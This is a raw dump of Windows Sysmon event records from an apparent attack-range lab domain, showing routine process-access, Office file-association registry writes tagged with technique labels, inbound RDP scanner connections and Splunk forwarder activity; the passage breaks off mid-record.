10341000x800000000000000075179Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:39.499{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBE3-607E-120D-00000000BB01}4508C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075178Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:39.499{A7A01FEF-EBDA-607E-C60C-00000000BB01}35121112C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE3-607E-120D-00000000BB01}4508C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000075177Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:39.467{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE3-607E-110D-00000000BB01}2120C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075176Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:39.452{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBE3-607E-110D-00000000BB01}2120C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075175Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:39.452{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE3-607E-110D-00000000BB01}2120C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000075174Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:57:39.374{A7A01FEF-EBE2-607E-100D-00000000BB01}6440C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1928-0\Microsoft.Office.Tools.Excel.Implementation.dll2021-04-20 14:57:39.374 354300x800000000000000050303Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:37.399{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-53304-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050302Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:36.693{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com58391-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050301Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:39.411{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0704A12B65706BAB282C99E61461374D,SHA256=F62B9A4962872333F86BEE448B2744F6BCD925718BC31E1B778B9C019B58227D,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000075302Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:57:40.983{A7A01FEF-EBE4-607E-1A0D-00000000BB01}6392C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\18f8-0\Microsoft.Office.Tools.Word.Implementation.dll2021-04-20 14:57:40.983 13241300x800000000000000075301Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:40.983{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.MDEFile.16\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE" /NOSTARTUP "%%1" %%2 %%3 %%4 %%5 %%6 %%7 %%8 %%9 13241300x800000000000000075300Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:40.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\accesshtmlfile\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE" 13241300x800000000000000075299Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:40.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.MDBFile\shell\openAsReadOnly\ddeexec\topic\(Default)ShellSystem 13241300x800000000000000075298Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:40.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.MDBFile\shell\openAsReadOnly\ddeexec\ifexec\(Default)[] 13241300x800000000000000075297Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:40.952{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.MDBFile\shell\openAsReadOnly\ddeexec\(Default)[SetForeground][ShellOpenDatabase "%%1",0,1] 13241300x800000000000000075296Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:40.952{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.MDBFile\shell\open\ddeexec\topic\(Default)ShellSystem 13241300x800000000000000075295Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:40.952{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.MDBFile\shell\open\ddeexec\ifexec\(Default)[] 13241300x800000000000000075294Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:40.952{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.MDBFile\shell\open\ddeexec\(Default)[SetForeground][ShellOpenDatabase "%%1"] 13241300x800000000000000075293Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:40.952{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.MDBFile\shell\open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE" /NOSTARTUP "%%1" %%2 %%3 %%4 %%5 %%6 %%7 %%8 %%9 13241300x800000000000000075292Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:40.952{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.MDBFile\shell\New\ddeexec\topic\(Default)ShellSystem 13241300x800000000000000075291Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:40.952{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.MDBFile\shell\New\ddeexec\ifexec\(Default)[] 13241300x800000000000000075290Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:40.952{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.MDBFile\shell\New\ddeexec\(Default)[SetForeground][ShellNewDatabase "%%1"] 13241300x800000000000000075289Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:40.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.MDBFile\shell\New\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE" /NOSTARTUP /n "%%1" 13241300x800000000000000075288Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:40.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.Extension.16\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE /NOSTARTUP "%%1" 13241300x800000000000000075287Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:40.920{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.Shortcut.Function.1\shell\open\ddeexec\topic\(Default)ShellSystem 13241300x800000000000000075286Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:40.920{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.Shortcut.Function.1\shell\open\ddeexec\ifexec\(Default)[] 13241300x800000000000000075285Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:40.920{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.Shortcut.Function.1\shell\open\ddeexec\(Default)[SetForeground][OpenFunction "%%1"] 13241300x800000000000000075284Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:40.905{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.Shortcut.Function.1\shell\open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE" /SHELLSYSTEM [OpenFunction "%%1"] 13241300x800000000000000075283Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:40.905{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.Shortcut.Function.1\shell\design\ddeexec\topic\(Default)ShellSystem 13241300x800000000000000075282Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:40.905{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.Shortcut.Function.1\shell\design\ddeexec\ifexec\(Default)[] 13241300x800000000000000075281Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:40.905{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.Shortcut.Function.1\shell\design\ddeexec\(Default)[SetForeground][OpenFunction "%%1", 1] 13241300x800000000000000075280Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:40.905{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.Shortcut.Function.1\shell\design\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE" /SHELLSYSTEM [OpenFunction "%%1", 1] 13241300x800000000000000075279Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:40.873{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.Project.16\shell\Open\ddeexec\topic\(Default)ShellSystem 13241300x800000000000000075278Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:40.873{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.Project.16\shell\Open\ddeexec\ifexec\(Default)[] 13241300x800000000000000075277Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:40.873{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.Project.16\shell\Open\ddeexec\(Default)[SetForeground][ShellOpenDatabase "%%1"] 13241300x800000000000000075276Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:40.873{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.Project.16\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE" /NOSTARTUP "%%1" %%2 %%3 %%4 %%5 %%6 %%7 %%8 %%9 13241300x800000000000000075275Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:40.858{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.BlankProjectTemplate.16\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE" /NOSTARTUP /NEWDB "%%1" 13241300x800000000000000075274Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:40.842{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ADEFile.16\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE" /NOSTARTUP "%%1" %%2 %%3 %%4 %%5 %%6 %%7 %%8 %%9 13241300x800000000000000075273Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:40.827{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.WebApplicationReference.16\shell\open\ddeexec\topic\(Default)ShellSystem 13241300x800000000000000075272Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:40.827{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.WebApplicationReference.16\shell\open\ddeexec\ifexec\(Default)[] 13241300x800000000000000075271Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:40.827{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.WebApplicationReference.16\shell\open\ddeexec\(Default)[SetForeground][ShellOpenDatabase "%%1"] 13241300x800000000000000075270Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:40.827{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.WebApplicationReference.16\shell\open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE" /NOSTARTUP "%%1" %%2 %%3 %%4 %%5 %%6 %%7 %%8 %%9 13241300x800000000000000075269Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:40.811{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.WizardUserDataFile.16\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE" /NOSTARTUP "%%1" 13241300x800000000000000075268Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:40.811{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ACCDTFile.16\shell\open\ddeexec\topic\(Default)ShellSystem 13241300x800000000000000075267Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:40.811{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ACCDTFile.16\shell\open\ddeexec\ifexec\(Default)[] 13241300x800000000000000075266Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:40.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ACCDTFile.16\shell\open\ddeexec\(Default)[SetForeground][ShellOpenDatabase "%%1"] 13241300x800000000000000075265Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:40.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ACCDTFile.16\shell\open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE" /NOSTARTUP "%%1" 13241300x800000000000000075264Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:40.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ACCDRFile.16\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE" /RUNTIME "%%1" %%2 %%3 %%4 %%5 %%6 %%7 %%8 %%9 13241300x800000000000000075263Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:40.780{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ACCDEFile.16\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE" /NOSTARTUP "%%1" %%2 %%3 %%4 %%5 %%6 %%7 %%8 %%9 10341000x800000000000000075262Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:40.780{A7A01FEF-B626-607E-1600-00000000BB01}15402648C:\Windows\system32\svchost.exe{A7A01FEF-EBE4-607E-1B0D-00000000BB01}6240C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075261Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:40.780{A7A01FEF-B626-607E-1600-00000000BB01}15401640C:\Windows\system32\svchost.exe{A7A01FEF-EBE4-607E-1B0D-00000000BB01}6240C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000075260Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:40.764{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ACCDCFile.16\shell\open\ddeexec\topic\(Default)ShellSystem 13241300x800000000000000075259Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:40.764{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ACCDCFile.16\shell\open\ddeexec\ifexec\(Default)[] 10341000x800000000000000075258Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:40.764{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE4-607E-1B0D-00000000BB01}6240C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000075257Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:40.764{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ACCDCFile.16\shell\open\ddeexec\(Default)[SetForeground][ShellOpenDatabase "%%1"] 23542300x800000000000000075256Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:40.764{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=84D09E939325FE17FFE3C74812B65068,SHA256=7A8F4B78EDBCE2A68819E77C599092C8D52EBF3F2156F5E9667894A65AA0D5B6,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000075255Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:40.748{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ACCDCFile.16\shell\open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE" /NOSTARTUP "%%1" 10341000x800000000000000075254Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:40.748{A7A01FEF-C0A3-607E-6C05-00000000BB01}36241208C:\Windows\system32\csrss.exe{A7A01FEF-EBE4-607E-1B0D-00000000BB01}6240C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075253Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 